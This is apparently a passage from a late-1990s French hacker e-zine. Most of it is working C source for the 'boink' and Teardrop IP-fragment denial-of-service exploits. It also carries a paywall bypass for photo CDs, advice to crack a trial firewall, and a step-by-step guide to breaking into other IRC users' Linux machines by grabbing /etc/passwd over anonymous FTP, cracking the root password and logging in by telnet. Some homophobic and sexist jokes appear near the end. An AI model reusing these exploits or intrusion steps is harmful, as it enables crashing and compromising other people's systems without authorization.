int     udplen=sizeof(struct udphdr),
        iplen=sizeof(struct iphdr),
        datalen=100,
        psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
        spf_sck;                        /* Socket */

void usage(void)
{
        /* fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n"); */
        fprintf (stderr, "Usage: ./boink <src_addr> <dst_addr> <start_port> <stop_port> [num]\n");
        exit(0);
}

u_long host_to_ip(char *host_name)
{
        static  u_long ip_bytes;
        struct hostent *res;

        res = gethostbyname(host_name);
        if (res == NULL)
                return (0);
        memcpy(&ip_bytes, res->h_addr, res->h_length);
        return (ip_bytes);
}

void quit(char *reason)
{
        perror(reason);
        close(spf_sck);
        exit(-1);
}

int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
           int dst_prt)
{
        int     bs;
        struct  sockaddr_in to;

        memset(&pkt, 0, psize);
                                                /* Fill in ip header */
        pkt.ip.version = 4;
        pkt.ip.ihl = 5;
        pkt.ip.tot_len = htons(udplen + iplen + PADDING);
        pkt.ip.id = htons(0x455);
        pkt.ip.ttl = 255;
        pkt.ip.protocol = IP_UDP;
        pkt.ip.saddr = src_addr;
        pkt.ip.daddr = dst_addr;
        pkt.ip.frag_off = htons(0x2000);        /* more to come */

        pkt.udp.source = htons(src_prt);        /* udp header */
        pkt.udp.dest = htons(dst_prt);
        pkt.udp.len = htons(8 + PADDING);
                                                /* send 1st frag */

        to.sin_family = AF_INET;
        to.sin_port = src_prt;
        to.sin_addr.s_addr = dst_addr;

        bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
                sizeof(struct sockaddr));

        pkt.ip.frag_off = htons(FRG_CONST + 1);         /* shinanigan */
        pkt.ip.tot_len = htons(iplen + FRG_CONST);
                                                        /* 2nd frag */

        bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
                (struct sockaddr *) &to, sizeof(struct sockaddr));

        return bs;
}

void main(int argc, char *argv[])
{
        u_long  src_addr,
                dst_addr;

        int     i,
               /* src_prt = 55,
                  dst_prt = 55, */ 
                start_port,
                stop_port,
                bs = 1,
                pkt_count;

        if (argc < 5)
                usage();

        start_port = (u_short) atoi (argv[ 3 ]);
        stop_port = (u_short) atoi (argv[ 4 ]);        
        if (argc == 6)
              pkt_count = atoi (argv[ 5 ]);
        
        
        if (start_port >= stop_port ||
            stop_port <= start_port) {
                
                start_port = 25;
                stop_port = 65;
        
        }
        
            
        if (pkt_count == 0)	pkt_count = 10;
        
        /* Resolve hostnames */

        src_addr = host_to_ip(argv[1]);
        if (!src_addr)
                quit("bad source host");
        dst_addr = host_to_ip(argv[2]);
        if (!dst_addr)
                quit("bad target host");

        spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (!spf_sck)
                quit("socket()");
        if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
        sizeof(bs)) < 0)
                quit("IP_HDRINCL");

        for (i = 0; i < pkt_count; ++i)
        {
                int j;
                
                printf ("(%d)%s:%d->%d\n", i, argv[ 2 ], start_port, stop_port);
                
                for (j = start_port; j != stop_port; j++) {
                
                 /* fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt); */
                    fondle (spf_sck, src_addr, dst_addr, j, j);

                }
                usleep(10000);
        }

        printf("Done.\n");
}


--------8<--Fin de Boink-----------8<-----------------------------------------

******************************************************************************

--------8<--Couper ici (Teardrop)--8<-----------------------------------------

/*
 *  Copyright (c) 1997 route|daemon9  <route@infonexus.com> 11.3.97
 *
 *  Linux/NT/95 Overlap frag bug exploit
 *
 *  Exploits the overlapping IP fragment bug present in all Linux kernels and
 *  NT 4.0 / Windows 95 (others?)
 *
 *  Based off of:   flip.c by klepto
 *  Compiles on:    Linux, *BSD*
 *
 *  gcc -O2 teardrop.c -o teardrop
 *      OR
 *  gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define PADDING 0x1c    /* datagram frame padding for first packet */
#define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                         * withstand maybe 5 or 10 sometimes...  Experiment.
                         */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/*
 *  Send two IP fragments with pathological offsets.  We use an implementation
 *  independent way of assembling network packets that does not rely on any of
 *  the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
 */

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    /*
     * Grab some memory for our packet, align p_ptr to point at the beginning
     * of our packet, and then fill it with zeros.
     */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /*  We set the fragment offset to be inside of the previous packet's
     *  payload (it overlaps inside the previous packet) but do not include
     *  enough payload to cover complete the datagram.  Just the header will
     *  do, but to crash NT/95 machines, a bit larger of packet seems to work
     *  better.
     */
    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr, "%s source_ip target_ip [-s src port] [-t dst port] [-n packets]\n", name);
    exit(0);
}


--------8<--Fin de Teardrop--------8<-----------------------------------------

******************************************************************************

Voila pour les progs :)

================================================================================================			Petite astuce pour les truc de charme By Fugitif
================================================================================================

Donc vous connaissez sans doute les dossier charme , des revue genre :
Generation 4, Pc fun...

Cette astuce sert a voir les photo  qu' on doit normalment decrypter en allant
sur le minitel, seulement le minitel ca coute cher...

Donc voila l'astuce:

Copiez le dossier charme du cd rom sur votre HD :
Ce sera donc C:\charme, apres faites ceci sous dos:
C:
cd\
cd charme
cd images
ren *.iba *.ica
cd ..
cd album 
ren *.iba *.ica

C'est bon :) Allez executez charme.exe,il y aura les nouvelles photos
et mattez bien :)

================================================================================================
				Etre proteger sur le net sous WIN By Fugitif
================================================================================================

Quand on est sur irc ou autres, il y a toujours un con qui va s'amuser avec 
votre ip, donc voici quelques choses à faires pour etre tranquile:

Sous windows:

Pour etre allaise sur le net, allez deja chercher un Fire Wall:
Sur www.signal9.com , ce firewall est limité à 15 jours, ben
à vous de trouver un cracks, il y en a plein sur le net...

Ps : si vous savez pas ce qu'est un Fire Wall, il existe beaucoup de docs
pour ca... En fait c'est une sorte de filtre entre votre ordi et internet,
d'ou le nom Firewall, de l'anglais " mur de feu ".

Ce FW est peut etre un peu chiant par moment, mais il protege bien.
Bon biensur avec un FW vous n'etes pas proteger à 100 % mais comme sur
les hackers ne se montre pas trop  sur Irc et autres vous n'aurez pas trop 
de souci et en plus, les hackers ont rien à foutre de votre HD....

Ou le mieux à faire est de spoofer sur icq, regardez le texte de
Andy98 ou sur IRC via une passerelle Wingates.

Les chevaux de troie:(le plus connu ici est celui de JC'zic)
Comment s'en débarraser?

Ben generalement, un cheval, une fois lancé il est en memoire, et il
ne fait pas que ca, il va se copier environ 3 fois dans vos
dossiers systémes selon le cheval, et sans oublier la base des
registres et le win.ini des fois :)
Il se peut aussi, qu'un cheval s'auto-supprime pour vous laisser 
aucun indice sur sa date, sa taille etc etc...
Donc faites toujours une sauvegarde du fichier qu'un inconnu vous a 
envoyé...

1-Comment l'enlever de la memoire?
Alors faites ctrl-alt-suppr, ensuite il y a tout les noms des programmes
afficher dans une liste, il suffit de cliquer sur le nom du trojan
(biensur si il a un nom spécifique, si c'est ce n'est pas le cas, 
essayer les noms un par un jusqu'a trouver le bon...) et de faire
Fin de taches.
Cas spécial : il se peut que le trojan ne soit pas en memoire, mais il
est quand meme actif. Il s'agit generalement de .vdx.

2-Comment le supprimer definitivemet?
Alors deja regardez la taille exacte du trojan avec propriétés.
Imaginons que le trojan fasse 132 007 octets, je vais dans menu
Démmarrer/Rechercher/fichier
Puis je recherche dans c:\ , les fichiers *.* cet à dire tout les fichiers
du disque dur, ensuite une fois tous trouver, reorganiser les fichiers par
taille dans affichage. Je cherche tous les fichiers qui font 132 007 octets.
Je note les nom, imaginons : _ Sys.exe dans c:\windows\
                             _ Svga.exe dans c:\windows\system\
                             _ Win.exe c:\windows\system\
Ce sont apparemment, les trois trojan.
Voila vous les avez trouver maintenant il faut les supprimer.
Il est preferable des les supprimer sous dos.
Donc un petit del et ca suffit.
Maintenant il faut les enlever de la base des registre.
Lisez la suite :)


3-Comment l'enlever de la base des registres?


Allez dans le menu démarrer / executer : regedit 
Ceci lance l'editeur de la base des registres:
Imaginons que ce soit toujours les memes trojans,allez
dans edition / rechercher, et rechercher un par les noms
des .exe, si il trouve les clés, supprimez les biensur à droite
de l'ecran, pas les dossier :)
Si jamais il trouve pas les noms, allez faire un tour dans:
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
et regardez dans les dossiers qui commence par run.
Et si vous trouvez des clé contenant le nom de l'exe avec son chemin
ou non, n'hesitez pas à suprimer.


Le cheval troyen le virus de JC'zic?

Ce virus est un cheval qui infecte des .exe en leur rajoutant des ko...
Donc au bout d'un moment le HD en prends un coup...
Pour le degager, il existe l'anti-virus, sur l'url qui suit...
Puis si vous voulez vous debarrasser du normal....
L'url, c'est:
http://altern.org/redox/

Dans le prochain n°, Etre proteger sous Linux...

================================================================================================
			Maintenant que je maitrise Linux. Je fais quoi? By Fugitif
================================================================================================

Donc si vous croyez qu'avec Linux vous aller devenir des Rebels du net
en deux jours vous y etes pas...
Ca prends enormement de temps.
Je vous conseille de lire les Noroutes et les Noways, et aussi Nofutur.

Commencez par essailler de hacker des petits serveurs ftp ou des université
assez vielles.Il y en a qui croit qu'il vont hacker la nasa avec le phf et
bé nan!

Toutes choses avant de essayer de hacker un 'tit serveur:

- La liste des mots de passes de defauts ( dans le 1 er n°).
- Le phf (ben vi ca peut toujours marcher).
- En anonymous ou en ftp.
- Le quote:
           quote user ftp
           quote cwd ~root
           quote pass ftp
- Trafiquer les .forward (mail).
- Moulinette.
- Les failles du sendmail.
- Voir si la becanne utilise le service NIS (pour le hack :)).
- Si l'admin est con, vérifiez que le /etc/passwd soit pas en weurld writable (777).

Il existe bien d'autres trucs...Quand je dis bien d'autres c'est genre des centaines.
Et quand je vous dis de lire les Noroute c'est pas pour rien :)

Si une de ces astuces à marcher, recuperez le fichier passwd et crackez-le
à l'aide d'un programme. (y'en a un sur notre site, puis il en existe pleins.)
Si il y a un X à la place de pass, c'est que le password est en shadow.
Et la vous etes un peu dans la merde.

Et aussi des fois il y a des petits rigolos sur Irc qui se la pete pasque qui ils
ont installer Linux et qui savent se connecter avec Irc avec, alors si le petit
rigolo n'a rien configuré, aller sur son Port 21 (ftp) en anonymous , et ensuite, 
prenez lui son password (get /etc/passwd) puis comme le 'tit rigolo n'a rien configuré
son password ne sera pas en shadow, donc décryptez le pass root. Ensuite logguez-vous
en Telnet avec son login root et le pass décrypté, et vous voila sur sa bécanne.
Aprés comme vous êtes root, vous pouvez tout faire, y compris lui prendre ses passes de
connexion qui sont dans un fichier de son script de connexion.
N'allez pas jusqu'à lui changer son passe root car le mec devra reinstaller....
Le mieux une fois sur le HD du mec, c'est de voir si il a une partoche win95 (allez dans 
/dev/) imaginons qu'il ai win95 sur la partition 1 , allez donc dans /mnt/ (cd /mnt) et 
creez un repertoire  "win" (mkdir win) et tapez:
mount -t msdos /dev/hda1 /mnt/win
Si marche kewl, allez dans /mnt/win et vous voila dans la partition windows du mec, chose
que n'ont ne peut pas faire avec win. Avec win, on infiltre le dd, mais on peut aller sur 
le linux du mec, tandis qu'avec Linux on fait les deux (win et linux).

PS: Configurez le inetd.conf dans /etc/ pour vos ports... 

Composition d'un fichier password:

login:password:user-ID:group-ID:info:home directory:startup program

Toto:007UiyT86:500:501:Toto 007:/home/toto:/bin/sh

login de l'user        :  Toto
Password crypté        :  007UiyT86
User ID                :  500
Group ID               :  501
Informations           :  Toto 007
Repertoire personnelle :  /home/toto (l'user arrive dans ce rep.)
Shell de démarage      :  /bin/sh   

Ca suffira :)

================================================================================================
					Dans le prochain n°...
================================================================================================

Oula! On en est pas encore la, mais on y pense et oui!
J'espere que vous penserez à nous envoyer des articles!

Alors: (biensur, c'est pas sur à 100 %)

- Le nbtstat sous Linux via le service SAMBA.
- Le Social Engineering.
- Etre protéger sous Linux.
- Faire un trojan (équivalent du Socket de troie) avec Delphi.
- Vos textes.
- Crackez les passwd...
- Lamers Vs Elites....
- Les meilleurs site Web By Cedru
- Les petits trucs de win98
- Service courrier (comme dans npc!! :) pour ca envoyez moi vos remarques et vos petits trucs
a partager sur mon adresse email : cedru13@hotmail.com.Je me ferais un plaisir de vous censurer
et de vous demolir dans mes reponses! ;) merde avec ce que je viens de dire, j'en ai refroidie
plus d'un!

C'est dure à trouver des idées vu que quand vous avez une idée, elle a deja ete
parue dans un autre zine.
Enfin on en trouvera vous inquietez pas! :)
Je te prends la parole mon petit fugitif (cedru qui parle) pour dire que pour les idées
d'articles ,je sais pas trop encore ce que je vais faire.J'attends l'inspiration du moment!!
Je suis très content d'avoir paticipé a ce numero2 ,mais plus on avance dans les numero et moins
je trouve d'idées.Deja pour le numero3 je me demande bien ce que je vais pouvoir mettre , et ce 
qui pourrait intéresser et instruire nos lecteurs.
================================================================================================
                              Recrute pour un groupe de hacker 
================================================================================================
                            
Donc nous cherchons tout hackers(ou hackeuses)   
voulant se joindre à notre groupe.
Du newbies aux pros nous en foutons de votre niveau:
du moment vous ecrivez des articles.

Mais pour cela vous devrez respectez certaines conditions:

- Faire des articles bien clair et comprehensif.
- Ne poa parle kome ca parceke sinon on pige poa ok?
- Ne pas venir dans le groupe pour de mauvaises intentions.
- Ne pas donnez de fausse infos.
- Ne donnez aucune infos personnelles dans vos articles.
- Respectez tout les menbres du groupe.
- Essailez de pas trop faire de fautes ok??

Bon ca devrait suffir pour les conditions :-)

Remarque:
Vos articles peuvent parler de tout.


Pour l'inscription c'est par e-mail que ca se passe:
Envoyez un courrier à:

fugitif@hotmail.com
ou
Cedru13@hotmail.com
ou
HeartWork666@hotmail.com

En indiquant:

- Votre nick et votre E-mail.
- Vous vous presentez un peu...(niveau,specialite...) NdCedru : specialite branlette,pipe??
NdHeart:(pour cedru ce sera : Taille, age...) >:) Ndcedru : (fille ou mec?? car j'aime pas les 
Pd ,voir article sur cedru en boite!)

En joigant:

- Votre ou vos articles qui seront publies dans le prochain nø.
NdCedru : non il rigolait, il faudra plutot lire qui ne sera jamais publie dans les prochains
numeros!! Censure oblige!! :)


================================================================================================
Le mot de la fin By Fugitif (NdCedru : moi aussi je veux ecrire des conneries dans cette partie)
================================================================================================

Ca a été plutot difficile de finir ce 2 émé zine, les idées nous manquaient, 
mais on a pu reussi à le finir malgré que HeartWork666 ne travail plus pour 
nous. NdCedru : il travail encore pour nous mais maintenant c est que pour dire des conneries
comme ce que je fais en ce moment!! ;) 
Merci pour le courrier, et sinon on recrute toujours pour le zine,
les textes sont bienvenues et esperons qu'il y aura un 3 eme n°.

Cedru qui parle maitenant pour donner son avis sur les emails qu on lui envoi!!! :)
Ca va saigner pour les lamers!!! :)
Bon deja dans certains email que je reçois, j'ai des numeros de téléphone de personnes voulant
discuter avec moi par téléphone! :) deja j appel personne,ca coute cher le telephone surtout
sur des portables,puis si j'etais de la dst je pourrais facilement vous tracer (nom,prenom,
adresse,sexe,age,age mentale,conneries??? :) )
Donc ne mettez pas de numero de téléphone ( a part si vous etes une fille avec une grosse
poitrine) pour les email c'est pareil,je reçois des vrais email comme par exemple
lamer@aol.com .Si j'étais de la dst ,avec votre email je telephonerais a votre provider qui me
donnerait votre (nom,prenom,adresse...) puis toc toc!!!! chez vous pour prendre votre pc et
chercher d''éventuel programmes crackers!! :)
Sinon dans le numero1 j'ai fait quelques erreurs dans mon article pour accéder a un pc via
l'acces reseau a distance,il fallait lire nbstat et pas ntbstats ! :) desoler je l'ai ecris
trop vite!! Pour mon email c est la faute des autres mongoles du zine (fugitig et heart...
il est trop long son nom) il fallait pas lire cedru@hotmail.com mais cedru13@hotmail.com.

Pour nous rendre visite, de préference le soir, on a un channel
sur irc.famipow.com à #deathlyby. Mais bon, vous nous trouverez plutot sur
IRCnet (#france, #warez-france...)

Et je rappel le site:
http://members.xoom.com/deathlyby/ ( si il est encore la :))

Greetz:
- Les gens qui lisent notre zine.
- Les gens qui nous envoient du courrier.
- Ceux qui m'ont aider et ceux qui ont fait des articles pour notre zine.
- Et puis, je sais pas moi....

Toujours les mêmes qui mettent le mot de la fin!! (Cedru)

Moi je remercie :
- Mes chats qui m'ont aidé pour la mise en page
- Mon frère qui ne comprends toujours pas ce que je fais sur informatique
- Mon nouveau Pc Pentiun2 400
- Mes parents qui me sponsorisent pour mes conneries sur le net
- France telecom avec qui j'ai toujours d'aussi bon rapport,pourquoi vous non? ;)

================================================================================================
				            	The END
================================================================================================

















